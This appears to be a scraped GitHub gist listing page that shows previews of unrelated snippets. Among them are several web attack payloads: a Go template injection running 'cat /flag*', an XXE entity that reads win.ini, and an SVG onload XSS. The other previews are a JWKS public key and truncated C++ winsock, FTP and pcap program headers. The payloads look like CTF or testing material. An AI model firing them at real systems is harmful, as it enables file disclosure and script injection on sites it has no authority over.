This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {{.FetchServerInfo "cat /flag*"}} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "keys": [ | |
| { | |
| "kty": "RSA", | |
| "e": "AQAB", | |
| "kid": "0f646f07-787d-4b5d-8d27-20a546e9fa23", | |
| "n": "srVoHoKGzEXh-cOf5kn9wazFIH4topuSC6fiUiUOKRfpVKhCr5IX8BOIv_kvdGFdDI0zwIG4EZORfTvarEwp2O3eB-rSuHbj7JRsP_oK9njSCsrSoeG-zEBwntVOkPml4RrXDPys7CIszmmCR4Kqvr-dDP6IaPGagMkWB0XwMJij2M_mpbhdwbAl_9Ahi-rUDqSMTFAOgCNYVs2gw_HFeuyc0baiN1BPiqCBIwVyJYEyL5cCr-AcO9sGeU_ZbIuvySZOeR3vrG5KsCfINbn20NW-t3c04mKJFaFdFAaLVkTc86vDg23V7wDaxxeOsYZPThTqR7Ugogi5HBhzNQqZsQ" | |
| } | |
| ] | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file://C:/windows/win.ini"> | |
| <!ENTITY % eval "<!ENTITY % error SYSTEM 'file://C:/nonexistent/%file;'>"> | |
| %eval; | |
| %error; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <svg onload=alert(origin)> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // download_management.cpp : Defines the entry point for the application. | |
| // | |
| #define CURL_STATICLIB | |
| #define LINE_LEN 16 | |
| #include "framework.h" | |
| #include "download_management.h" | |
| #include <regex> | |
| #include "pcap.h" | |
| #include <curl.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // FTPClient.cpp : This file contains the 'main' function. Program execution begins and ends there. | |
| // | |
| #include <stdio.h> | |
| #include <winsock2.h> | |
| #pragma comment(lib, "ws2_32") | |
| #pragma warning(disable:4996) | |
| SOCKET controlSocket; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ChatServer.cpp : This file contains the 'main' function. Program execution begins and ends there. | |
| // | |
| #include <stdio.h> | |
| #include <winsock2.h> | |
| #pragma comment(lib, "ws2_32") | |
| #pragma warning(disable:4996) | |
| DWORD WINAPI ClientThread(LPVOID); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ChatServer.cpp : This file contains the 'main' function. Program execution begins and ends there. | |
| // | |
| #include <stdio.h> | |
| #include <winsock2.h> | |
| #pragma comment(lib, "ws2_32") | |
| #pragma warning(disable:4996) | |
| DWORD WINAPI ClientThread(LPVOID); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <winsock2.h> | |
| #pragma comment(lib, "ws2_32") | |
| #pragma warning (disable: 4996) | |
| DWORD WINAPI ClientThread(LPVOID lpParam); | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <winsock2.h> | |
| #include <string.h> | |
| #pragma comment(lib, "ws2_32") | |
| #pragma warning(disable : 4996) | |
| SOCKET clients[64]; | |
| int numClients; |
NewerOlder